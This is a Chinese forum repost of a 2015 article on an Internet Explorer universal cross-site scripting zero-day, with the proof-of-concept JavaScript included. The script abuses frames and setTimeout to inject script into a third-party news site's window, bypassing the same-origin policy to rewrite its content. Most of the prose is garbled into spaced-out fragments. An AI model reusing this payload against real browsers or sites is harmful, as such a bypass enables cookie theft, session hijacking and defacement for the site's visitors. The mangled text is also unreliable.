搜索

[8661] 2015-02-05_最新XSS0day漏洞来袭,影响最新版本IE浏览器(含POC)

文档创建者:s7ckTeam
浏览次数:41
最后更新:2025-01-17
2015-02-05_最新XSS0day漏洞来袭,影响最新版本IE浏览器(含POC) X S S   0 d a y I E P O C F r e e B u f   2 0 1 5 - 0 2 - 0 5 X S S   0 d a y I E I E X S S S O P w e b 访 D O M 访 D O M P O C D e u s e n P O C 使 I E 访 S O P D e m o H a c k e d   b y   D e u s e n c o o k i e c o o k i e 访 访 I E 使 使 f u n c t i o n   g o ( ) {       w = w i n d o w . f r a m e s [ 0 ] ;       w . s e t T i m e o u t ( " a l e r t ( e v a l ( ' x = t o p . f r a m e s [ 1 ] ; r = c o n f i r m ( ' C l o s e t h i s   w i n d o w   a f t e r   3 s e c o n d s . . . ' ) ; x . l o c a t i o n = ' j a v a s c r i p t : % 2 2 % 3 C s c r i p t % 3 E f u n c t i o n % 2 0 a ( ) % 7 B w . d o c u m e n t . b o d y . i n n e r H T M L % 3 D % 2 7 % 3 C a % 2 0 s t y l e % 3 D f o n t - s i z e % 3 A 5 0 p x % 3 E H a c k e d % 2 0 b y % 2 0 D e u s e n % 3 C % 2 F a % 3 E % 2 7 % 3 B % 7 D % 2 0 f u n c t i o n % 2 0 o ( ) % 7 B w % 3 D w i n d o w . o p e n ( % 2 7 h t t p % 3 A % 2 F % 2 F w w w . d a i l y m a i l . c o . u k % 2 7 % 2 C % 2 7 _ b l a n k % 2 7 % 2 C % 2 7 t o p % 3 D 0 % 2 C % 2 0 l e f t % 3 D 0 % 2 C % 2 0 w i d t h % 3 D 8 0 0 % 2 C % 2 0 h e i g h t % 3 D 6 0 0 % 2 C % 2 0 l o c a t i o n % 3 D y e s % 2 C % 2 0 s c r o l l b a r s % 3 D y e s % 2 7 ) % 3 B s e t T i m e o u t ( % 2 7 a ( ) % 2 7 % 2 C 7 0 0 0 ) % 3 B % 7 D % 3 C % 2 F s c r i p t % 3 E % 3 C a % 2 0 h r e f % 3 D % 2 7 j a v a s c r i p t % 3 A o ( ) % 3 B v o i d ( 0 ) % 3 B % 2 7 % 3 E G o % 3 C % 2 F a % 3 E % 2 2 ' ; ' ) ) " , 1 ) ; } s e t T i m e o u t ( " g o ( ) " , 1 0 0 0 ) ; I E S m a r t S c r e e n 访 访 [ S e c u r i t y A f f a i r s F r e e B u f F r e e B u f . C O M ]
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理